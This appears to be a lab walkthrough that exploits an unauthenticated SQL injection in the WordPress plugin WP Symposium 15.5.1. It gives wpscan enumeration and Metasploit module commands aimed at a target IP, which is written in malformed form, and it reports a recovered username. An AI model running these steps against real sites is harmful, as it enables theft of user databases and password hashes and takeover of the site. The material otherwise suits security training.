WP Symposium turns a WordPress website into a Social
Network! It is a WordPress plugin that provides a forum, activity (similar to
Facebook wall), member directory, private mail, notification panel, chat
windows, profile page, social widgets, activity alerts, RSS activity feeds,
Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose
which you want to activate! Certain features are optional to members to protect
their privacy."
Wordpress
plugin wp-symposium version 15.5.1 (and probably all existing previous
versions) suffers from an unauthenticated SQL Injection in get_album_item.php
parameter 'size'. The issue is exploitable even if the plugin is deactivated.
The SQL injection allows
(very easily) to retrieve all the database content, which includes users
details and password hashes. An attacker may be able to crack users' password
hashes and log in as them. If an administrator user password is obtained, then
the attacker could take complete control of the Wordpress installation.
Collected information may also allow further attacks.
Attacker: kali
Linux
Target: wordpress
Let start!!!!
Start WPSCAN in kali from following step:
Now scan the
target IP for scanning any wordpress application and type following command
Through this command we are scanning current plugin
installed for any wordpress website.
./wpscan.rb –url http://192.1681.0.104 --enumerate p
The
red sign indicating wp symposium 15.5.1 is vulnerable and suffers from an unauthenticated
SQL Injection although blue sign shows version 15.8 if fixed which is not
vulnerable till now.
Now start metasploit for attack and type msfconsole on terminal in kali Linux.
msf > use
auxiliary/admin/http/wp_symposium_sql_injection
msf auxiliary(wp_symposium_sql_injection) >set
rhost 192.1681.0.104
msf
auxiliary(wp_symposium_sql_injection) >set rport 80
msf
auxiliary(wp_symposium_sql_injection) >exploit
Nice!!! Here
we found the relevant username and password as user: raj respectively.
0 comments:
Post a Comment